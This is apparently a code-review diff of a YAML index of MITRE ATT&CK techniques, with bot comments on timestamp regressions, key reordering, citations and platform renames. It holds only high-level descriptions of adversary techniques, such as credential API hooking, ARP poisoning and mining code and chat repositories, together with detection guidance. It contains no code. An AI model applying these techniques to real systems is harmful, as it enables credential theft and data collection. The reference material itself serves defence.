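Review bot: the new T1213.004 object lands between T1056 (`attack-pattern--bb5a00de-...`) and T1557.002, which fits the file's apparent STIX-id ordering (`bbfbb096` sorts after `bb5a00de`); each of the three `(Citation: ...)` keys in the description has a matching `source_name`, so the cross-references resolve. `x_mitre_detection: ''` is empty and `atomic_tests: []`, as with T1557.004 above; if the index is meant to flag techniques with no test coverage, these two new entries are the ones to surface.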
@@ -41449,7 +42047,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
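Review bot: T1557.002's `modified` moves back from '2022-11-08T14:00:00.188Z' to '2022-07-22T18:37:22.176Z', and in the next hunk the object keeps `x_mitre_attack_spec_version: 2.1.0` together with its old key order (`modified` / `created_by_ref` / `name` after `description`) while nearly every other object in this diff is re-serialized at 3.2.0. That combination looks like this object was sourced from an older bundle than its neighbours; confirm upstream really left T1557.002 at 2.1.0, or regenerate it from the same bundle as the rest.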
@@ -41468,37 +42066,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
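Review bot: most of this hunk is key reordering (`x_mitre_platforms`, `x_mitre_is_subtechnique`, `x_mitre_deprecated` and `x_mitre_contributors` move position with identical values), which buries the two substantive changes: the description now links `[Unsecured Credentials](https://attack.mitre.org/techniques/T1552)` instead of plain "credentials", and `x_mitre_version` goes from `'1.1'` to `'1.2'`. If the generator can emit keys in a stable order, future diffs would show only real changes. Also note that `spec_version: '2.1'` is dropped here; any consumer that reads that key from the index should be checked.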
@@ -41521,41 +42118,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
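Review bot: the rewritten T1213 description introduces three new citation tags, `(Citation: Mitiga)`, `(Citation: TrendMicro Exposed Redis 2020)` and `(Citation: Cybernews Reuters Leak 2022)`; each needs a matching `external_references` entry in the same technique (they are added in the following hunks) or the tags render as dangling text. The string also carries trailing spaces before line breaks (`(PII) \n\n`, `databases \n*`, `Microsoft Teams \n\n`), which come from upstream but will surface verbatim in any rendered output; better stripped in the generator than hand-edited in the index.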
@@ -41584,10 +42192,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
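Review bot: the platform list replaces `Office 365` and `Google Workspace` with a single `Office Suite` entry (with `x_mitre_version` moving from `'3.3'` to `'3.4'`). Any downstream per-platform index, filter or test selector keyed on the old platform strings will silently drop T1213; check that the index generation recognises `Office Suite` before this lands.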
@@ -41600,10 +42207,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
@@ -41612,11 +42229,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
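Review bot: the new `Cybernews Reuters Leak 2022` reference has a stray space in the author field (`Vilius Petkauskas .`); this is upstream data but will render as-is, so it is worth reporting upstream rather than patching here. The rest of the hunk (`spec_version: '2.1'` removed, reference added) follows the same pattern as the other techniques in this patch.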
@@ -41653,7 +42273,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
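Review bot: `modified` for SNMP (MIB Dump) also regresses, from `'2021-04-29T14:49:39.188Z'` to `'2020-10-22T01:54:22.812Z'`; same concern as with ARP Cache Poisoning above, confirm the STIX bundle the index was regenerated from.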
@@ -41685,115 +42305,182 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-08-27T21:03:56.385Z'
+ name: 'Input Capture: Credential API Hooking'
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Metadata'
+ - 'Process: OS API Execution'
type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
created: '2020-02-11T19:01:15.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1056.004
url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
- source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
Retrieved December 18, 2017.
url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Hook Overview
description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
description: Stack Exchange - Security. (2012, July 31). What are the methods
to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
- name: 'Input Capture: Credential API Hooking'
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1056.004
+ atomic_tests: []
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- - 'Process: Process Metadata'
- - 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- identifier: T1056.004
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
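Review bot: the new T1213.005 (Messaging Applications) entry ships with `x_mitre_detection: ''`, so the index carries no detection guidance for it; that is upstream content, but consumers that render the detection field will show it empty. Two consistency points in the same hunk: T1213.005 has no `identifier:` key, while T1056.004 keeps `identifier: T1056.004` directly above it and T1021.005 keeps `identifier: T1021.005` further down, so confirm whether the generator intends that; and T1056.004 loses `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) with no replacement field. The `Sentinel Labs NullBulge 2024` description also begins with a leading space (`" Jim Walter.`), again upstream data that will render verbatim.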
@@ -41804,6 +42491,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -41813,7 +42501,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -41829,66 +42516,67 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
